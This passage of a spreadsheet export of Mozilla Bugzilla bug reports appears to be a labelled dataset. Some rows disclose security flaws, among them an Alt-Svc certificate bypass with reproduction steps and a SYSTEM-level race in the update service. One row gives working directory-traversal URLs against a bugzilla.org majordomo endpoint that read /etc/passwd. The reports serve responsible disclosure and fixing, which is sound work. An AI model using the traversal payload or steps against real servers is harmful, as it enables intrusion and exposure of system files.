      <c r="S872" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T872" t="n">
        <v>1</v>
      </c>
      <c r="U872" t="n">
        <v>0</v>
      </c>
      <c r="V872" t="n">
        <v>49</v>
      </c>
      <c r="W872" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2342.2 Safari/537.36
Steps to reproduce:
(1) Launch https://mallory.csrf.jp:8020/altsvccertbypass/
(2) You can see the certificate error page. This is a correct behavior.
(3) Launch http://csrf.jp/altsvccertbypass/ . This page sets Alt-Svc header h2="mallory.csrf.jp:8020".
(4) Reload the page.
(5) Instead of the page shown in (3), https://mallory.csrf.jp:8020/altsvccertbypass/ is shown as an alternative http/2 service.
(6) Open a new tab and launch https://mallory.csrf.jp:8020/altsvccertbypass/ again.
(7) You can NOT see the certificate error page.
Actual results:
In above (5) and (7), invalid certificate page https://mallory.csrf.jp:8020/altsvccertbypass/ is shown.
Expected results:
The server certificate used by mallory.csrf.jp:8020 is only valid for 'csrf.jp' and 'alice.csrf.jp'.
Firefox should not show the page.</t>
        </is>
      </c>
      <c r="X872" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="873">
      <c r="A873" t="n">
        <v>1108455</v>
      </c>
      <c r="B873" t="inlineStr">
        <is>
          <t>2014-12-07 21:44:43 -0800</t>
        </is>
      </c>
      <c r="C873" t="inlineStr">
        <is>
          <t>Execution of arbitrary addresses in relation to WebRTC MediaStreamgraph.</t>
        </is>
      </c>
      <c r="D873" t="inlineStr">
        <is>
          <t>2024-05-30 08:38:47 -0700</t>
        </is>
      </c>
      <c r="E873" t="n">
        <v>1</v>
      </c>
      <c r="F873" t="n">
        <v>1</v>
      </c>
      <c r="G873" t="n">
        <v>3</v>
      </c>
      <c r="H873" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I873" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J873" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K873" t="inlineStr">
        <is>
          <t>34 Branch</t>
        </is>
      </c>
      <c r="L873" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M873" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N873" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O873" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P873" t="inlineStr">
        <is>
          <t>[adv-main35+][adv-esr31.4+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q873" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R873" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S873" t="inlineStr">
        <is>
          <t>mozilla37</t>
        </is>
      </c>
      <c r="T873" t="n">
        <v>1</v>
      </c>
      <c r="U873" t="n">
        <v>0</v>
      </c>
      <c r="V873" t="n">
        <v>57</v>
      </c>
      <c r="W873" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Steps to reproduce:
I've been examining the crash reports for WebAudio and WebRTC, and recently came across this class of crashes: https://crash-stats.mozilla.com/signature/?signature=mozilla%3A%3AMediaStreamGraphImpl%3A%3AOneIteration(__int64%2C+__int64%2C+__int64%2C+__int64)&amp;_columns=date&amp;_columns=product&amp;_columns=version&amp;_columns=build_id&amp;_columns=platform&amp;_columns=reason&amp;_columns=address&amp;page=1 
All occurred after the release of FF34. I have been attempting to reproduce the crash and have strong reason to believe the execution is occurring within the block at http://hg.mozilla.org/releases/mozilla-release/annotate/8274648ad79f/content/media/MediaStreamGraph.cpp#l1372 after examining the state of registers in that block in comparison to the crash reports.
Actual results:
While I have been working on this, the crash at https://crash-stats.mozilla.com/report/index/4e244741-db33-4400-bc4a-bbe442141208 occurred, and examining that it seems as someone is attempting to execute arbitrary code, and has succeeded in doing so. As they submitted a crash report, I would imagine they will be reporting this as well, but just in case I thought it would be prudent to notify you.</t>
        </is>
      </c>
      <c r="X873" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="874">
      <c r="A874" t="n">
        <v>416251</v>
      </c>
      <c r="B874" t="inlineStr">
        <is>
          <t>2008-02-07 16:13:59 -0800</t>
        </is>
      </c>
      <c r="C874" t="inlineStr">
        <is>
          <t>set up suite of machines for jss testing.</t>
        </is>
      </c>
      <c r="D874" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E874" t="n">
        <v>1</v>
      </c>
      <c r="F874" t="n">
        <v>1</v>
      </c>
      <c r="G874" t="n">
        <v>5</v>
      </c>
      <c r="H874" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I874" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J874" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K874" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L874" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M874" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N874" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O874" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P874" t="inlineStr"/>
      <c r="Q874" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R874" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S874" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T874" t="n">
        <v>1</v>
      </c>
      <c r="U874" t="n">
        <v>0</v>
      </c>
      <c r="V874" t="n">
        <v>21</v>
      </c>
      <c r="W874" t="inlineStr">
        <is>
          <t>We don't want to add another half an hour to the currently up talos machines' cycle time, so we are going to set up machines to only run jss tests.  
Proposed machines:
- 3 winxp trunk
- 3 mac10.4.8 trunk</t>
        </is>
      </c>
      <c r="X874" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="875">
      <c r="A875" t="n">
        <v>1430860</v>
      </c>
      <c r="B875" t="inlineStr">
        <is>
          <t>2018-01-16 10:52:02 -0800</t>
        </is>
      </c>
      <c r="C875" t="inlineStr">
        <is>
          <t>move destination configuration into Python module for processor</t>
        </is>
      </c>
      <c r="D875" t="inlineStr">
        <is>
          <t>2018-03-20 07:58:51 -0700</t>
        </is>
      </c>
      <c r="E875" t="n">
        <v>1</v>
      </c>
      <c r="F875" t="n">
        <v>1</v>
      </c>
      <c r="G875" t="n">
        <v>4</v>
      </c>
      <c r="H875" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I875" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J875" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K875" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L875" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M875" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N875" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O875" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P875" t="inlineStr"/>
      <c r="Q875" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R875" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S875" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T875" t="n">
        <v>1</v>
      </c>
      <c r="U875" t="n">
        <v>0</v>
      </c>
      <c r="V875" t="n">
        <v>3</v>
      </c>
      <c r="W875" t="inlineStr">
        <is>
          <t>The processor is a FetchTransformSaveWithSeparateNewCrashSourceApp Socorro app which has a destination for saving processed crashes. That destination is entirely defined in configuration like this:
destination.storage0.benchmark_tag=PGBenchmarkWrite
destination.storage0.crashstorage_class=socorro.external.statsd.statsd_base.StatsdBenchmarkingWrapper
destination.storage0.statsd_prefix=processor.postgres
destination.storage0.transaction_executor_class=socorro.database.transaction_executor.TransactionExecutorWithInfiniteBackoff
destination.storage0.wrapped_crashstore=socorro.external.postgresql.crashstorage.PostgreSQLCrashStorage
destination.storage0.wrapped_object_class=socorro.external.postgresql.crashstorage.PostgreSQLCrashStorage
destination.storage1.active_list=save_raw_and_processed
destination.storage1.benchmark_tag=BotoBenchmarkWrite
destination.storage1.crashstorage_class=socorro.external.statsd.statsd_base.StatsdBenchmarkingWrapper
destination.storage1.statsd_prefix=processor.s3
destination.storage1.use_mapping_file=False
destination.storage1.wrapped_crashstore=socorro.external.boto.crashstorage.BotoS3CrashStorage
destination.storage1.wrapped_object_class=socorro.external.boto.crashstorage.BotoS3CrashStorage
destination.storage2.active_list=save_raw_and_processed
destination.storage2.benchmark_tag=BotoBenchmarkWrite
destination.storage2.crashstorage_class=socorro.external.statsd.statsd_base.StatsdBenchmarkingWrapper
destination.storage2.es_redactor.forbidden_keys=memory_report, upload_file_minidump_browser.json_dump, upload_file_minidump_flash1.json_dump, upload_file_minidump_flash2.json_dump
destination.storage2.statsd_prefix=processor.es
destination.storage2.use_mapping_file=False
destination.storage2.wrapped_crashstore=socorro.external.boto.crashstorage.BotoS3CrashStorage
destination.storage2.wrapped_object_class=socorro.external.es.crashstorage.ESCrashStorageRedactedJsonDump
...
The way that's configured is really tough. For example, it's hard to accurately and confidently change the position of two crash storage destinations. For example, it's hard to drop a crash storage destination in the middle of the list. It's hard to clean up crash storage configuration after changes like that time we changed the StatsdBenchmarkingWrapper configuration (wrapped_crashtore vs. wrapped_object_class which appears to still be in configuration).
This bug covers moving destination specification to code so that it's in a Python data structure in a Python module and versioned with everything else much like we've done with other things like the signature generation pipeline, processor rule sets, and other things.</t>
        </is>
      </c>
      <c r="X875" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="876">
      <c r="A876" t="n">
        <v>628064</v>
      </c>
      <c r="B876" t="inlineStr">
        <is>
          <t>2011-01-22 16:15:45 -0800</t>
        </is>
      </c>
      <c r="C876" t="inlineStr">
        <is>
          <t>Directory traversal in majordomo2's 'help' command</t>
        </is>
      </c>
      <c r="D876" t="inlineStr">
        <is>
          <t>2024-05-29 15:48:31 -0700</t>
        </is>
      </c>
      <c r="E876" t="n">
        <v>1</v>
      </c>
      <c r="F876" t="n">
        <v>1</v>
      </c>
      <c r="G876" t="n">
        <v>5</v>
      </c>
      <c r="H876" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I876" t="inlineStr">
        <is>
          <t>Security Assurance</t>
        </is>
      </c>
      <c r="J876" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K876" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L876" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M876" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N876" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O876" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P876" t="inlineStr">
        <is>
          <t>[infrasec:input][ws:critical]</t>
        </is>
      </c>
      <c r="Q876" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R876" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S876" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T876" t="n">
        <v>1</v>
      </c>
      <c r="U876" t="n">
        <v>0</v>
      </c>
      <c r="V876" t="n">
        <v>29</v>
      </c>
      <c r="W876" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Build Identifier: 
This is a very serious vulnerability and i would like to say that i respect your privacy and I have only done what is necessary to prove that this is a real issue and not a false positive.  I like you guys, thank you for making the web a better place. 
http://bugzilla.org/cgi-bin/mj_wwwusr?passw=&amp;list=GLOBAL&amp;user=&amp;func=help&amp;extra=/../../../../../../../../etc/passwd
verification:
http://bugzilla.org/cgi-bin/mj_wwwusr?passw=&amp;list=GLOBAL&amp;user=&amp;func=help&amp;extra=/../../../../../../../../etc/group
Reproducible: Always</t>
        </is>
      </c>
      <c r="X876" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="877">
      <c r="A877" t="n">
        <v>867056</v>
      </c>
      <c r="B877" t="inlineStr">
        <is>
          <t>2013-04-30 00:56:38 -0700</t>
        </is>
      </c>
      <c r="C877" t="inlineStr">
        <is>
          <t>Arbitrary code execution using a temporarily inaccessible file</t>
        </is>
      </c>
      <c r="D877" t="inlineStr">
        <is>
          <t>2024-05-30 08:02:37 -0700</t>
        </is>
      </c>
      <c r="E877" t="n">
        <v>1</v>
      </c>
      <c r="F877" t="n">
        <v>1</v>
      </c>
      <c r="G877" t="n">
        <v>3</v>
      </c>
      <c r="H877" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I877" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J877" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K877" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L877" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M877" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N877" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O877" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P877" t="inlineStr">
        <is>
          <t>[adv-main22+]</t>
        </is>
      </c>
      <c r="Q877" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R877" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S877" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T877" t="n">
        <v>1</v>
      </c>
      <c r="U877" t="n">
        <v>0</v>
      </c>
      <c r="V877" t="n">
        <v>11</v>
      </c>
      <c r="W877" t="inlineStr">
        <is>
          <t>In fixing Bug 850492, the updater.exe that the Maintenance Service tries to verify is now copied to a known safe location to stop the user pointing it to a malicious path and replacing the executable after verification.
Unfortunately, if the system cannot copy the file it doesn't error and exit, just logs a warning, uses the malicious path and continues on like normal. 
This introduces a second race condition in that if you have an updater.exe which doesn't exist when execution hits workmonitor.cpp:589 the file copy will fail and the system will use the malicious path. The attacker can then create malicious_path\updater.exe before the program sets the write lock at workmonitor.cpp:332 and then use the same process described in Bug 850492 to execute arbitrary code as SYSTEM.
For convenience, source revision the line numbers are for is latest at the current time and located at:
https://hg.mozilla.org/mozilla-central/file/1eb382609c2d/toolkit/components/maintenanceservice/workmonitor.cpp</t>
        </is>
      </c>
      <c r="X877" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="878">
      <c r="A878" t="n">
        <v>492562</v>
      </c>
      <c r="B878" t="inlineStr">
        <is>
          <t>2009-05-12 09:29:11 -0700</t>
        </is>
      </c>
      <c r="C878" t="inlineStr">
        <is>
          <t>please QA the Fastest Firefox upload page</t>
        </is>
      </c>
      <c r="D878" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E878" t="n">
        <v>1</v>
      </c>
      <c r="F878" t="n">
        <v>1</v>
      </c>
      <c r="G878" t="n">
        <v>5</v>
      </c>
      <c r="H878" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I878" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J878" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K878" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L878" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M878" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N878" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O878" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P878" t="inlineStr"/>
      <c r="Q878" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R878" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S878" t="inlineStr">
        <is>
          <t>3.5</t>
        </is>
      </c>
      <c r="T878" t="n">
        <v>1</v>
      </c>
      <c r="U878" t="n">
        <v>0</v>
      </c>
      <c r="V878" t="n">
        <v>80</v>
      </c>
      <c r="W878" t="inlineStr">
        <is>
          <t>Hi guys. The final component of the Fastest Firefox page is now ready for QA...please take a look.
This is the page where people will actually upload their videos to us. It'll be accessed from https://www-trunk.stage.mozilla.com/en-US/firefox/fastest/.
Alex Buchanan, who built the uploader, notes that the following items are still missing:
1) the uploads and log directories are locked down, IT to set these up as they would be in production, bug 491757 
2) locale detection.  I've written this, I'll commit it to stage after some testing
QA guys, I know you're super busy right now, but is there any chance we could get this finalized by the end of the week?</t>
        </is>
      </c>
      <c r="X878" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="879">
      <c r="A879" t="n">
        <v>913010</v>
      </c>
      <c r="B879" t="inlineStr">
        <is>
          <t>2013-09-05 07:58:05 -0700</t>
        </is>
      </c>
      <c r="C879" t="inlineStr">
        <is>
          <t>&lt;model&gt;.uncached manager return wrong results</t>
        </is>
      </c>
      <c r="D879" t="inlineStr">
        <is>
          <t>2013-09-10 04:57:18 -0700</t>
        </is>
      </c>
      <c r="E879" t="n">
        <v>1</v>
      </c>
      <c r="F879" t="n">
        <v>1</v>
      </c>
      <c r="G879" t="n">
        <v>6</v>
      </c>
      <c r="H879" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I879" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J879" t="inlineStr">
        <is>
          <t>Code Quality</t>
        </is>
      </c>
      <c r="K879" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L879" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M879" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N879" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O879" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P879" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q879" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R879" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S879" t="inlineStr">
        <is>
          <t>2013-09-17</t>
        </is>
      </c>
      <c r="T879" t="n">
        <v>1</v>
      </c>
      <c r="U879" t="n">
        <v>0</v>
      </c>
      <c r="V879" t="n">
        <v>6</v>
      </c>
      <c r="W879" t="inlineStr">
        <is>
          <t>Our model manager `uncached` and `with_deleted` are completely wrong in some cases:
- `Addon.uncached` returns deleted results (`Addon.objects.no_cache()` works)
- `Webapp.uncached` returns deleted results AND non-Webapps (`Webapp.objects.no_cache()` works)
- `Webapp.with_deleted.count` somehow generates a buggy query missing the table (!) and returns a DatabaseError (`Webapp.with_deleted.all()` works)
This is causing bugs everywhere. It explains bug 912178, some weird bugs in the Reviewer tools, probably more.</t>
        </is>
      </c>
      <c r="X879" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="880">
      <c r="A880" t="n">
        <v>795284</v>
      </c>
      <c r="B880" t="inlineStr">
        <is>
          <t>2012-09-28 05:17:22 -0700</t>
        </is>
      </c>
      <c r="C880" t="inlineStr">
        <is>
          <t>Write after free related to mozilla::TracerRunnable::~TracerRunnable()</t>
        </is>
      </c>
      <c r="D880" t="inlineStr">
        <is>
          <t>2019-03-13 06:46:04 -0700</t>
        </is>
      </c>
      <c r="E880" t="n">
        <v>1</v>
      </c>
      <c r="F880" t="n">
        <v>1</v>
      </c>
      <c r="G880" t="n">
        <v>3</v>
      </c>
      <c r="H880" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I880" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J880" t="inlineStr">
        <is>
          <t>DOM: UI Events &amp; Focus Handling</t>
        </is>
      </c>
      <c r="K880" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L880" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M880" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N880" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O880" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P880" t="inlineStr">
        <is>
          <t>[adv-main18+]</t>
        </is>
      </c>
      <c r="Q880" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R880" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S880" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T880" t="n">
        <v>1</v>
      </c>
      <c r="U880" t="n">
        <v>0</v>
      </c>
      <c r="V880" t="n">
        <v>13</v>
      </c>
      <c r="W880" t="inlineStr">
        <is>
          <t>Multiple read- and write-after-free and double free errors observed at
shutdown on Fennec.
STR: build with profiler (SPS) support.  Start Fennec.  Start the
profiler using "Toggle Sampling" in the main menu.  Then use main menu
to quit.  There are multiple invalid memory accesses, ending in a
segfault (which may or may not be related).</t>
        </is>
      </c>
      <c r="X880" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="881">
      <c r="A881" t="n">
        <v>572149</v>
      </c>
      <c r="B881" t="inlineStr">
        <is>
          <t>2010-06-15 10:17:09 -0700</t>
        </is>
      </c>
      <c r="C881" t="inlineStr">
        <is>
          <t>segfault while running mochitest with messageManager.loadFrameScript()</t>
        </is>
      </c>
      <c r="D881" t="inlineStr">
        <is>
          <t>2010-06-22 13:18:51 -0700</t>
        </is>
      </c>
      <c r="E881" t="n">
        <v>1</v>
      </c>
      <c r="F881" t="n">
        <v>1</v>
      </c>
      <c r="G881" t="n">
        <v>3</v>
      </c>
      <c r="H881" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I881" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J881" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K881" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L881" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M881" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N881" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O881" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P881" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q881" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R881" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S881" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T881" t="n">
        <v>1</v>
      </c>
      <c r="U881" t="n">
        <v>0</v>
      </c>
      <c r="V881" t="n">
        <v>11</v>
      </c>
      <c r="W881" t="inlineStr">
        <is>
          <t>I have been tracking down for the last couple days a few issues related to my mochitest + e10s patch.  There are two issues remaining and it is a crash of firefox (linux and winnt) for toolkit/content/tests/widgets/test_tree_hier.xul and an a11y test (which I can work around, but still we should fix).
I have narrowed down the test_tree_heir.xul issue and this is how you can reproduce it:
1) download build + tests: http://ftp.mozilla.org/pub/mozilla.org/firefox/tryserver-builds/jmaher@mozilla.com-f62530962001/tryserver-linux-debug/
2) unpack both to the same directory (like tinderbox does)
3) run this command: python mochitest/runtests.py --appname=firefox/firefox-bin --utility-path=bin --extra-profile-file=bin/plugins --certificate-path=certs --close-when-done --console-level=INFO --test-path=toolkit/content/tests/widgets --autorun
4) observe the failure near the end of the test run.  As a note, I usually see this assertion "Assertion failure: StackBase(cx-&gt;fp) + stackDepth &lt;= cx-&gt;regs-&gt;sp, at /builds/slave/tryserver-linux-debug/build/js/src/jsinterp.cpp:1221", at least when I get an exit code 6.  Other times I get an exit code 11 with no assertion message.
Since I cannot reproduce this locally with a build on my machine, I have to work with builds from the try server (i.e. no symbols).  Here is the stack trace that I have found to date:
(gdb) bt
#0  0x0012d422 in __kernel_vsyscall ()
#1  0x0013c230 in raise () from /lib/tls/i686/cmov/libpthread.so.0
#2  0x026df75f in JS_Assert () from /home/joel/mozilla/simple_e10s/firefox/libmozjs.so
#3  0x0263d14e in ?? () from /home/joel/mozilla/simple_e10s/firefox/libmozjs.so
#4  0x0263ac71 in ?? () from /home/joel/mozilla/simple_e10s/firefox/libmozjs.so
#5  0x0263f54e in js_Invoke () from /home/joel/mozilla/simple_e10s/firefox/libmozjs.so
#6  0x0263fa45 in ?? () from /home/joel/mozilla/simple_e10s/firefox/libmozjs.so
#7  0x0259ce54 in JS_CallFunctionValue () from /home/joel/mozilla/simple_e10s/firefox/libmozjs.so
#8  0x00c6ef16 in ?? () from /home/joel/mozilla/simple_e10s/firefox/libxul.so
#9  0x00ca64ae in ?? () from /home/joel/mozilla/simple_e10s/firefox/libxul.so
#10 0x00ca6c78 in ?? () from /home/joel/mozilla/simple_e10s/firefox/libxul.so
#11 0x0182053c in ?? () from /home/joel/mozilla/simple_e10s/firefox/libxul.so
#12 0x0182076d in ?? () from /home/joel/mozilla/simple_e10s/firefox/libxul.so
#13 0x0181903b in ?? () from /home/joel/mozilla/simple_e10s/firefox/libxul.so
#14 0x017abe24 in ?? () from /home/joel/mozilla/simple_e10s/firefox/libxul.so
#15 0x016d0d5a in ?? () from /home/joel/mozilla/simple_e10s/firefox/libxul.so
#16 0x018886e3 in ?? () from /home/joel/mozilla/simple_e10s/firefox/libxul.so
#17 0x018886fb in ?? () from /home/joel/mozilla/simple_e10s/firefox/libxul.so
#18 0x0188875f in ?? () from /home/joel/mozilla/simple_e10s/firefox/libxul.so
#19 0x01583538 in ?? () from /home/joel/mozilla/simple_e10s/firefox/libxul.so
#20 0x012eb151 in ?? () from /home/joel/mozilla/simple_e10s/firefox/libxul.so
#21 0x003e0530 in XRE_main () from /home/joel/mozilla/simple_e10s/firefox/libxul.so
#22 0x08048e42 in ?? ()
#23 0x03114bd6 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
#24 0x080489f1 in ?? ()
(gdb) 
I have also spent some time figuring out what is causing the problem.  I have narrowed my patch down and found that when I do a messageManager.loadFrameScript("data:,dump('hello world');", true);
I get a crash.  For more reference on how I am doing the messageManager calls, please see the attachment to bug 567417.
In addition, I tried to narrow the test case down (somewhat).  I found that in this directory:
http://mxr.mozilla.org/mozilla-central/source/toolkit/content/tests/widgets/
there are 3 tests that need to be run in order:
test_tooltip.xul
test_tree.xul
test_tree_hier.xul
In addition, I have reduced test_tooltip.xul down to:
http://pastebin.mozilla.org/735695
This is silly as if I remove this simple test file the whole widgets directory completes without crashing.  Same with removing the function and code in the file as referenced by the comments.
This is blocking finishing up the mochitest patch in bug 567417 which is in turn blocking landing e10s on m-c.</t>
        </is>
      </c>
      <c r="X881" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="882">
      <c r="A882" t="n">
        <v>1189082</v>
      </c>
      <c r="B882" t="inlineStr">
        <is>
          <t>2015-07-29 14:44:16 -0700</t>
        </is>
      </c>
      <c r="C882" t="inlineStr">
        <is>
          <t>location bar continues displaying wyciwyg URI and resource URI if user tries to navigate to it manually</t>
        </is>
      </c>
      <c r="D882" t="inlineStr">
        <is>
          <t>2024-05-30 09:03:48 -0700</t>
        </is>
      </c>
      <c r="E882" t="n">
        <v>1</v>
      </c>
      <c r="F882" t="n">
        <v>1</v>
      </c>
      <c r="G882" t="n">
        <v>2</v>
      </c>
      <c r="H882" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I882" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J882" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K882" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L882" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M882" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N882" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O882" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P882" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main44+]</t>
        </is>
      </c>
      <c r="Q882" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R882" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S882" t="inlineStr">
        <is>
          <t>Firefox 44</t>
        </is>
      </c>
      <c r="T882" t="n">
        <v>1</v>
      </c>
